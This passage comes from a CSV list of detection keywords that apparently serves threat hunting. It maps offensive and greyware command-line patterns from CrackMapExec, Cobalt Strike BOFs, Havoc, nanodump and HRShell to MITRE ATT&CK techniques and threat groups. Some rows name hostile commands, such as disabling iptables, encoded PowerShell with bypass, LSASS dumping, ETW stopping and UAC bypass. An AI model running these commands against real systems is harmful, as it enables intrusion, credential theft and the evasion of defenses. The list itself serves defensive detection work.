security tools scanning or reporting information.,T1055 - T1070.004 - T1218.011,TA0007 - TA0005 - TA0040,N/A,N/A,Defense Evasion,https://attack.mitre.org/techniques/T1562/001/,1,0,greyware tool - risks of False positive !,N/A,N/A,N/A,N/A,N/A,N/A -chkconfig off iptables,greyware_tool_keyword,iptables,Adversaries may disable security tools to avoid possible detection of their tools and activities. 
This can take the form of killing security software or event logging processes* deleting Registry keys so that tools do not start at run time* or other methods to interfere with security tools scanning or reporting information.,T1055 - T1070.004 - T1218.011,TA0007 - TA0005 - TA0040,N/A,N/A,Defense Evasion,https://attack.mitre.org/techniques/T1562/001/,1,0,greyware tool - risks of False positive !,N/A,N/A,N/A,N/A,N/A,N/A -cmd.exe /c PowerShell.exe -Exec ByPass -Nol -Enc *,greyware_tool_keyword,powershell,Jenkins Abuse Without admin access,T1210.002 - T1078.003 - T1046,TA0001 - TA0007 - TA0040,N/A,N/A,AD Enumeration,https://hideandsec.sh/books/cheatsheets-82c/page/active-directory,1,0,greyware tool - risks of False positive !,N/A,N/A,N/A,N/A,N/A,N/A -cme smb *,offensive_tool_keyword,crackmapexec,crackmapexec command lines. CrackMapExec or CME is a post-exploitation tool developed in Python and designed for penetration testing against networks. CrackMapExec collects Active Directory information to conduct lateral movement through targeted networks,T1087.002 - T1110 - T1110.001 - T1110.003 - T1059.001 - T1083 - T1112 - T1135 - T1003.002 - T1003.003 - T1003.004 - T1201 - T1069.002 - T1018 - T1053.002 - T1082 - T1016 - T1049 - T1550.002,TA0002 - TA0006 - TA0007,N/A,APT39 - Dragonfly - FIN7 - MuddyWater,POST Exploitation tools,https://github.com/Porchetta-Industries/CrackMapExec,1,0,N/A,N/A,10,7678,1595,2023-09-09T14:19:36Z,2015-08-14T14:11:55Z -cme smb -*,offensive_tool_keyword,crackmapexec,A swiss army knife for pentesting networks,T1210 T1570 T1021 T1595 T1592 T1589 T1590 ,N/A,N/A,N/A,POST Exploitation tools,https://github.com/byt3bl33d3r/CrackMapExec,1,0,N/A,N/A,10,7678,1595,2023-09-09T14:19:36Z,2015-08-14T14:11:55Z -cme winrm *,offensive_tool_keyword,crackmapexec,crackmapexec command lines. CrackMapExec or CME is a post-exploitation tool developed in Python and designed for penetration testing against networks. 
CrackMapExec collects Active Directory information to conduct lateral movement through targeted networks,T1087.002 - T1110 - T1110.001 - T1110.003 - T1059.001 - T1083 - T1112 - T1135 - T1003.002 - T1003.003 - T1003.004 - T1201 - T1069.002 - T1018 - T1053.002 - T1082 - T1016 - T1049 - T1550.002,TA0002 - TA0006 - TA0007,N/A,APT39 - Dragonfly - FIN7 - MuddyWater,POST Exploitation tools,https://github.com/Porchetta-Industries/CrackMapExec,1,0,N/A,N/A,10,7678,1595,2023-09-09T14:19:36Z,2015-08-14T14:11:55Z -dcenum *,offensive_tool_keyword,havoc,Havoc is a modern and malleable post-exploitation command and control framework,T1573-001 - T1573-002 - T1573-003 - T1573-004 - T1573-005 - T1059-001 - T1059-003 - T1027 - T1071-001 - T1003 - T1055 - T1036 - T1105 - T1218 - T1057 - T1574-001,TA0002 - TA0003,N/A,N/A,C2,https://github.com/HavocFramework/Havoc,1,0,N/A,10,10,4893,746,2023-10-03T23:32:31Z,2022-09-11T13:21:16Z -delete_file *.dll,offensive_tool_keyword,nanodump,The swiss army knife of LSASS dumping. 
A flexible tool that creates a minidump of the LSASS process.,T1003.001 - T1003.003,TA0006,N/A,N/A,Credential Access,https://github.com/fortra/nanodump,1,0,N/A,N/A,10,1467,208,2023-09-04T01:25:27Z,2021-11-10T18:28:15Z -detect-hooks,offensive_tool_keyword,cobaltstrike,Proof of concept Beacon Object File (BOF) that attempts to detect userland hooks in place by AV/EDR,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29,C2,https://github.com/anthemtotheego/Detect-Hooks,1,0,N/A,10,10,138,28,2021-07-22T20:13:16Z,2021-07-22T18:58:23Z -doc.1a.*\.*,offensive_tool_keyword,cobaltstrike,dns beacons - Adversary Simulations and Red Team Operations are security assessments that replicate the tactics and techniques of an advanced adversary in a network,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - 
T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29,C2,https://www.cobaltstrike.com/,1,1,dns query field,10,10,N/A,N/A,N/A,N/A -doc.4a.*\.*,offensive_tool_keyword,cobaltstrike,dns beacons - Adversary Simulations and Red Team Operations are security assessments that replicate the tactics and techniques of an advanced adversary in a network,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29,C2,https://www.cobaltstrike.com/,1,1,dns query field,10,10,N/A,N/A,N/A,N/A 
-doc.bc.*\.*,offensive_tool_keyword,cobaltstrike,dns beacons - Adversary Simulations and Red Team Operations are security assessments that replicate the tactics and techniques of an advanced adversary in a network,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29,C2,https://www.cobaltstrike.com/,1,1,dns query field,10,10,N/A,N/A,N/A,N/A -doc.md.*\.*,offensive_tool_keyword,cobaltstrike,dns beacons - Adversary Simulations and Red Team Operations are security assessments that replicate the tactics and techniques of an advanced adversary in a network,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - 
T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29,C2,https://www.cobaltstrike.com/,1,1,dns query field,10,10,N/A,N/A,N/A,N/A -doc.po.*\.*,offensive_tool_keyword,cobaltstrike,dns beacons - Adversary Simulations and Red Team Operations are security assessments that replicate the tactics and techniques of an advanced adversary in a network,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29,C2,https://www.cobaltstrike.com/,1,1,dns query field,10,10,N/A,N/A,N/A,N/A -doc.tx.*\.*,offensive_tool_keyword,cobaltstrike,dns beacons - Adversary Simulations and Red Team Operations are security assessments that replicate the tactics and techniques of an advanced adversary in a 
network,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29,C2,https://www.cobaltstrike.com/,1,1,dns query field,10,10,N/A,N/A,N/A,N/A -doc-stg-prepend*.*,offensive_tool_keyword,cobaltstrike,dns beacons - Adversary Simulations and Red Team Operations are security assessments that replicate the tactics and techniques of an advanced adversary in a network,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - 
TA0040,N/A,DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29,C2,https://www.cobaltstrike.com/,1,1,dns query field,10,10,N/A,N/A,N/A,N/A -doc-stg-sh*.*,offensive_tool_keyword,cobaltstrike,dns beacons - Adversary Simulations and Red Team Operations are security assessments that replicate the tactics and techniques of an advanced adversary in a network,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29,C2,https://www.cobaltstrike.com/,1,1,dns query field,10,10,N/A,N/A,N/A,N/A -dumpwifi *,offensive_tool_keyword,cobaltstrike,Various Cobalt Strike BOFs,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - 
T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29,C2,https://github.com/rvrsh3ll/BOF_Collection,1,0,N/A,10,10,480,49,2022-10-16T13:57:18Z,2020-07-16T18:24:55Z -etw stop,offensive_tool_keyword,cobaltstrike,Collection of Beacon Object Files,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29,C2,https://github.com/ajpc500/BOFs,1,0,N/A,10,10,475,115,2022-11-01T14:51:07Z,2020-12-19T11:21:40Z -EVUAC *,offensive_tool_keyword,cobaltstrike,Beacon Object File implementation of Event Viewer 
deserialization UAC bypass,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29,C2,https://github.com/netero1010/TrustedPath-UACBypass-BOF,1,0,N/A,10,10,104,33,2021-08-16T07:49:55Z,2021-08-07T03:40:33Z -exploit -j -z,offensive_tool_keyword,HRShell,HRShell is an HTTPS/HTTP reverse shell built with flask. 
It is an advanced C2 server with many features & capabilities.,T1021.002 - T1105 - T1059.001 - T1059.003 - T1064,TA0008 - TA0011 - TA0002,N/A,N/A,C2,https://github.com/chrispetrou/HRShell,1,0,N/A,10,10,244,73,2021-09-09T08:26:32Z,2019-08-20T15:24:46Z -fw_walk display*,offensive_tool_keyword,cobaltstrike,A BOF to interact with COM objects associated with the Windows software firewall.,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29,C2,https://github.com/EspressoCake/Firewall_Walker_BOF,1,0,N/A,10,10,98,13,2021-10-10T03:28:27Z,2021-10-09T05:17:10Z -fw_walk status*,offensive_tool_keyword,cobaltstrike,A BOF to interact with COM objects associated with the Windows software firewall.,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - 
T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29,C2,https://github.com/EspressoCake/Firewall_Walker_BOF,1,0,N/A,10,10,98,13,2021-10-10T03:28:27Z,2021-10-09T05:17:10Z -fw_walk total*,offensive_tool_keyword,cobaltstrike,A BOF to interact with COM objects associated with the Windows software firewall.,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29,C2,https://github.com/EspressoCake/Firewall_Walker_BOF,1,0,N/A,10,10,98,13,2021-10-10T03:28:27Z,2021-10-09T05:17:10Z -Get-ADComputer -Filter {TrustedForDelegation -eq 
$True},greyware_tool_keyword,powershell,AD Module Enumerate computers with Unconstrained Delegation,T1021.004 - T1087.002 - T1018,TA0007 - TA0008 - TA0011,N/A,N/A,AD Enumeration,https://hideandsec.sh/books/cheatsheets-82c/page/active-directory,1,0,greyware tool - risks of False positive !,N/A,N/A,N/A,N/A,N/A,N/A -Get-ADGroup -Filter *Name -like *admin*,greyware_tool_keyword,powershell,AD Module Search for a particular string in attributes (admin),T1087.002 - T1018 - T1069.002,TA0007 - TA0009,N/A,N/A,AD Enumeration,https://hideandsec.sh/books/cheatsheets-82c/page/active-directory,1,0,greyware tool - risks of False positive !,N/A,N/A,N/A,N/A,N/A,N/A -Get-ADObject -Filter {msDS-AllowedToDelegateTo * -Properties msDS-AllowedToDelegateTo*,greyware_tool_keyword,powershell,AD Module Enumerate principals with Constrained Delegation enabled,T1021.004 - T1087.002 - T1018,TA0007 - TA0008 - TA0011,N/A,N/A,AD Enumeration,https://hideandsec.sh/books/cheatsheets-82c/page/active-directory,1,0,greyware tool - risks of False positive !,N/A,N/A,N/A,N/A,N/A,N/A -Get-ADObject -SearchBase *CN=Shadow Principal Configuration*CN=Services* (Get-ADRootDSE).configurationNamingContext) | select *msDS-ShadowPrincipalSid*,greyware_tool_keyword,powershell,Enumerate shadow security principals mapped to a high priv group,T1069.002 - T1087.002 - T1018,TA0007 - TA0009,N/A,N/A,AD Enumeration,https://hideandsec.sh/books/cheatsheets-82c/page/active-directory,1,0,greyware tool - risks of False positive !,N/A,N/A,N/A,N/A,N/A,N/A -Get-ADUser -Filter {DoesNotRequirePreAuth -eq $True} -Properties DoesNotRequirePreAuth,greyware_tool_keyword,powershell,AD module Enumerate users,T1021.004 - T1087.002 - T1018,TA0007 - TA0008 - TA0011,N/A,N/A,AD Enumeration,https://hideandsec.sh/books/cheatsheets-82c/page/active-directory,1,0,greyware tool - risks of False positive !,N/A,N/A,N/A,N/A,N/A,N/A -Get-ADUser -Filter {TrustedForDelegation -eq $True},greyware_tool_keyword,powershell,AD Module Enumerate computers with 
Unconstrained Delegation,T1021.004 - T1087.002 - T1018,TA0007 - TA0008 - TA0011,N/A,N/A,AD Enumeration,https://hideandsec.sh/books/cheatsheets-82c/page/active-directory,1,0,greyware tool - risks of False positive !,N/A,N/A,N/A,N/A,N/A,N/A -get-delegation *,offensive_tool_keyword,cobaltstrike,This tool uses LDAP to check a domain for known abusable Kerberos delegation settings,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29,C2,https://github.com/IcebreakerSecurity/DelegationBOF,1,0,N/A,10,10,115,21,2022-05-04T14:00:36Z,2022-03-28T20:14:24Z -get-delegation *,offensive_tool_keyword,DelegationBOF,This tool uses LDAP to check a domain for known abusable Kerberos delegation settings. Currently. it supports RBCD. Constrained. Constrained w/Protocol Transition. 
and Unconstrained Delegation checks.,T1098 - T1214 - T1552,TA0006,N/A,N/A,Credential Access,https://github.com/IcebreakerSecurity/DelegationBOF,1,0,N/A,N/A,10,115,21,2022-05-04T14:00:36Z,2022-03-28T20:14:24Z -Get-DomainComputer -TrustedToAuth,greyware_tool_keyword,powershell,AD Module Enumerate principals with Constrained Delegation enabled,T1021.004 - T1087.002 - T1018,TA0007 - TA0008 - TA0011,N/A,N/A,AD Enumeration,https://hideandsec.sh/books/cheatsheets-82c/page/active-directory,1,0,greyware tool - risks of False positive !,N/A,N/A,N/A,N/A,N/A,N/A -Get-DomainUser -TrustedToAuth,greyware_tool_keyword,powershell,AD Module Enumerate principals with Constrained Delegation enabled,T1021.004 - T1087.002 - T1018,TA0007 - TA0008 - TA0011,N/A,N/A,AD Enumeration,https://hideandsec.sh/books/cheatsheets-82c/page/active-directory,1,0,greyware tool - risks of False positive 